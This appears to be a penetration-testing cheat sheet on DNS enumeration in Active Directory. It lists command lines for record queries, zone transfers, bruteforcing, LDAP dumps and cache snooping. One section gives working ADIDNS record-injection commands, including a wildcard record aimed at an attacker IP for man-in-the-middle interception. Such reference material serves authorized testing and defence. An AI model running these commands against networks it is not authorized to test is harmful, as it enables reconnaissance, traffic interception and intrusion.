DNS Enumeration
DNS enumeration reveals internal hosts, services, and Active Directory structure. ADIDNS integration creates additional attack vectors for record injection and MITM attacks.
flowchart TD
A[DNS Enum] --> B[Zone Transfer]
A --> C[Record Queries]
A --> D[ADIDNS]
A --> E[Reverse Lookup]
B --> B1[AXFR]
C --> C1[A/AAAA Records]
C --> C2[SRV Records]
C --> C3[TXT Records]
D --> D1[LDAP DNS]
D --> D2[Record Injection]
style A fill:#00ff00,stroke:#000,color:#000
style B1 fill:#a855f7,stroke:#000,color:#000
style D2 fill:#a855f7,stroke:#000,color:#000
Basic DNS Queries
Record Types
bash
# A records (IPv4)
dig @DC_IP corp.local A
nslookup -type=A corp.local DC_IP
# AAAA records (IPv6)
dig @DC_IP corp.local AAAA
# MX records
dig @DC_IP corp.local MX
# TXT records (SPF, DKIM, etc)
dig @DC_IP corp.local TXT
# NS records
dig @DC_IP corp.local NS
# SOA record
dig @DC_IP corp.local SOA
# All records
dig @DC_IP corp.local ANYActive Directory SRV Records
Tip
AD uses standard SRV records to advertise services. These reveal DCs, GCs, and Kerberos servers.
bash
# Domain Controllers
dig @DC_IP _ldap._tcp.dc._msdcs.corp.local SRV
nslookup -type=SRV _ldap._tcp.dc._msdcs.corp.local DC_IP
# Global Catalogs
dig @DC_IP _gc._tcp.corp.local SRV
dig @DC_IP _ldap._tcp.gc._msdcs.corp.local SRV
# Kerberos servers
dig @DC_IP _kerberos._tcp.corp.local SRV
dig @DC_IP _kerberos._udp.corp.local SRV
# KDC (Key Distribution Center)
dig @DC_IP _kdc._tcp.corp.local SRV
# PDC Emulator
dig @DC_IP _ldap._tcp.pdc._msdcs.corp.local SRV
# Sites
dig @DC_IP _ldap._tcp.sitename._sites.corp.local SRVZone Transfer
Warning
Zone transfers (AXFR) expose the entire DNS zone. Test carefully as this may trigger alerts.
bash
# Attempt zone transfer
dig @DC_IP corp.local AXFR
# Using host
host -l corp.local DC_IP
# Using nslookup
nslookup
> server DC_IP
> set type=AXFR
> corp.local
# DNSrecon zone transfer
dnsrecon -d corp.local -n DC_IP -t axfr
# Fierce
fierce --domain corp.local --dns-servers DC_IPReverse DNS Lookup
bash
# Single IP reverse lookup
dig @DC_IP -x 10.0.0.1
# Reverse zone transfer
dig @DC_IP 0.0.10.in-addr.arpa AXFR
# Bulk reverse lookup (bash)
for ip in $(seq 1 254); do
dig @DC_IP -x 10.0.0.$ip +short
done
# DNSrecon reverse bruteforce
dnsrecon -d corp.local -n DC_IP -r 10.0.0.0/24
# Using nmap
nmap -sL 10.0.0.0/24 --dns-servers DC_IPDNS Bruteforce
bash
# DNSrecon bruteforce
dnsrecon -d corp.local -n DC_IP -D wordlist.txt -t brt
# Fierce
fierce --domain corp.local --dns-servers DC_IP --subdomain-file subdomains.txt
# Gobuster DNS
gobuster dns -d corp.local -r DC_IP -w wordlist.txt
# dnscan
dnscan.py -d corp.local -w wordlist.txt -r DC_IP
# Common internal subdomains
mail, webmail, owa, autodiscover
vpn, remote, gateway
dc, dc01, dc02, ad
sql, db, database
web, www, intranet
file, files, share
print, printer
backup, bakADIDNS Enumeration
Tip
Active Directory Integrated DNS stores records in AD. Any authenticated user can query (and potentially add) records.
Enumerate DNS Records via LDAP
bash
# List DNS zones
ldapsearch -x -H ldap://DC_IP -D "user@corp.local" -W \
-b "CN=MicrosoftDNS,DC=DomainDnsZones,DC=corp,DC=local" "(objectClass=dnsZone)"
# List DNS records in a zone
ldapsearch -x -H ldap://DC_IP -D "user@corp.local" -W \
-b "DC=corp.local,CN=MicrosoftDNS,DC=DomainDnsZones,DC=corp,DC=local" "(objectClass=dnsNode)" \
name dnsRecord
# Forest DNS zones
ldapsearch -x -H ldap://DC_IP -D "user@corp.local" -W \
-b "CN=MicrosoftDNS,DC=ForestDnsZones,DC=corp,DC=local" "(objectClass=dnsZone)"adidnsdump
bash
# Dump all DNS records
adidnsdump -u corp.local\user -p password ldap://DC_IP
# Output: records.csv with all ADIDNS records
# Also resolves 'YOURNAME' tombstoned records
# Dump specific zone
adidnsdump -u corp.local\user -p password ldap://DC_IP --zone corp.local
# Include deleted/tombstoned records
adidnsdump -u corp.local\user -p password ldap://DC_IP --include-tombstonedDNSUpdate (Record Injection)
Warning
Default ADIDNS permissions allow authenticated users to create new records - useful for MITM attacks!
bash
# Check permissions with Powermad
Import-Module Powermad
Get-ADIDNSZone -TargetDC DC_IP
# Add A record
Invoke-DNSUpdate -DNSType A -DNSName attacker -DNSData 10.0.0.100
# Add wildcard record (catch-all for MITM)
Invoke-DNSUpdate -DNSType A -DNSName '*' -DNSData 10.0.0.100
# Using nsupdate (create update.txt first)
# Contents: server DC_IP, zone corp.local, update add attacker.corp.local 86400 A 10.0.0.100, send
nsupdate update.txt
# Krbrelayx - ADIDNS poisoning
dnstool.py -u 'corp.local\user' -p password --action add --record 'attacker' --data 10.0.0.100 --type A DC_IPDNS Cache Snooping
bash
# Check if DNS server allows cache snooping
# Non-recursive query for cached records
dig @DC_IP www.google.com A +norecurse
# If it returns results, cache snooping is possible
# This reveals what domains users have been accessing
# Check common domains
for domain in github.com dropbox.com pastebin.com; do
echo "Checking $domain"
dig @DC_IP $domain A +norecurse +short
donePowerShell DNS Enumeration
powershell
# Get DNS servers
Get-DnsClientServerAddress
# DNS cache
Get-DnsClientCache
# Resolve-DnsName
Resolve-DnsName -Name corp.local -Type ALL
Resolve-DnsName -Name _ldap._tcp.dc._msdcs.corp.local -Type SRV
# Get all DNS zones (requires DNS admin)
Get-DnsServerZone -ComputerName DC
# Get DNS records (requires DNS admin)
Get-DnsServerResourceRecord -ZoneName corp.local -ComputerName DC
# Test zone transfer
$records = @()
$ns = Resolve-DnsName -Name corp.local -Type NS
$records = Resolve-DnsName -Name corp.local -Type AXFR -Server $ns[0].NameHost -DnsOnlyAutomated Tools
DNSrecon
bash
# Standard enumeration
dnsrecon -d corp.local -n DC_IP
# All enumeration types
dnsrecon -d corp.local -n DC_IP -a
# Cache snooping
dnsrecon -d corp.local -n DC_IP -t snoop -D domains.txt
# Output to XML
dnsrecon -d corp.local -n DC_IP --xml output.xmlCrackMapExec
bash
# Enumerate DNS (limited)
crackmapexec smb DC_IP -u user -p pass -M dns
# Better: Query LDAP for DNS
crackmapexec ldap DC_IP -u user -p pass -M dnsCommon Discovery Targets
text
# High-value DNS records to find
_msdcs.corp.local # AD forest root
_sites.corp.local # AD sites
_tcp.corp.local # Service records
gc._msdcs.corp.local # Global Catalogs
_kerberos._tcp.corp.local # Kerberos servers
_ldap._tcp.corp.local # LDAP servers
# Common hostnames
dc01, dc02, dc1, dc2 # Domain Controllers
sql, sql01, database # SQL servers
exchange, mail, cas # Exchange servers
adfs, sts # Federation services
ca, pki, cert # Certificate Authority
sccm, wsus # Management servers
backup, veeam, dpm # Backup servers